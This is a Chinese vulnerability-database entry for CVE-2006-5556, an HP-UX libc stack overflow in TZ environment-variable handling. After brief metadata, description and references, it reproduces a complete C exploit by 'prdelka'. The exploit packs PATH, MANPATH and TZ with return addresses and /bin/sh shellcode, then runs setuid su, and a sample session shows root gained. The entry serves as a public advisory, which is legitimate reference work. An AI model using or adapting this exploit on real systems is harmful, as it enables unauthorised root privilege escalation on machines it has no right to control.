HP-UX LIBC TZ环境变量本地溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111375 漏洞类型 缓冲区溢出
发布时间 2006-10-24 更新时间 2006-10-30
CVE编号 CVE-2006-5556 CNNVD-ID CNNVD-200610-481
漏洞平台 HP-UX CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/2636
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-481
|漏洞详情
HP-UX是一款HP公司开发的UNIX操作系统。HP-UX的LIBC实现在处理TZ环境变量时存在缓冲区溢出漏洞,本地攻击者可能利用此漏洞提升权限。由于没有在localtime_r()及相关函数中执行充分的边界检查,HP-UX的libc库在处理TZ环境变量时存在栈溢出漏洞。任何使用timezone函数的suid或sgid程序都受这个漏洞影响。成功攻击可能导致权限提升。
|漏洞EXP
/* HP-UX libc timezone environment overflow exploit
 * ================================================
 * HP-UX libc contains an exploitable stack overflow
 * in the handling of "TZ" environment variable. The
 * problem occurs due to insufficient bounds checking
 * in the localtime_r() and related functions. Any suid
 * or sgid program which uses the timezone functions can
 * be used as an attack vector. This exploit uses "su" 
 * to obtain root priviledges.  
 *
 * Example. 
 * $ cc prdelka-vs-HPUX-libc.c -o prdelka-vs-HPUX-libc
 * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file 
 * (prdelka-vs-HPUX-libc.o) was detected. The linked output may not run 
 * on a PA 1.x system.
 * $ uname -a
 * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license
 * $ id
 * uid=102(user) gid=20(users)
 * $ ./prdelka-vs-HPUX-libc
 * [ HP-UX libc timezone environment overflow
 * Password:
 * # id
 * uid=102(user) gid=20(users) euid=0(root)
 *
 * - prdelka
 */

char shellcode[]="\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
		 "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08"
		 "\xb4\x16\x70\x16""/bin/sh";

int main(){
        char *a, adr[4],ptr1[4],ptr2[4],*b,*envp[3];
        int i;
        *(unsigned long*)adr=0x10eC7f7F;
        *(unsigned long*)ptr1=0x059c7f7f;
        *(unsigned long*)ptr2=0x7f7f059c;
        b=(char*)malloc(126);
        memset(b,0,126);
        a=b;
        sprintf(b,"PATH=");
        b+=5;
        for(i=0;i<120;i++) *b++=ptr1[i%4];
        envp[0]=a;
        b=(char*)malloc(809);
        memset(b,0,809);
        a=b;
        sprintf(b,"MANPATH=");
        b+=8;
        for(i=0;i<800;i++) *b++=ptr1[i%4];
        envp[1]=a;
        b=(char*)malloc(3429);
        memset(b,0,3427);
        a=b;
        sprintf(b,"TZ=");
        b+=3;
        for(i=0;i<2384;i++) *b++=ptr1[i%4];
        for(i=0;i<4;i++) *b++=ptr2[i%4];
        for(i=0;i<1002;i++) *b++=adr[i%4];
        for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
        envp[2]=a;
        envp[3]=0;
	printf("[ HP-UX libc timezone environment overflow\n");
        execle("/usr/bin/su","pdk",0,envp);
}

// milw0rm.com [2006-10-24]
|参考资料

来源:BID
名称:20718
链接:http://www.securityfocus.com/bid/20718
来源:XF
名称:hpux-timezone-bo(29777)
链接:http://xforce.iss.net/xforce/xfdb/29777
来源:MILW0RM
名称:2636
链接:http://www.milw0rm.com/exploits/2636
来源:MISC
链接:http://blogs.23.nu/prdelka/stories/13144/
来源:MILW0RM
名称:2636
链接:http://milw0rm.com/exploits/2636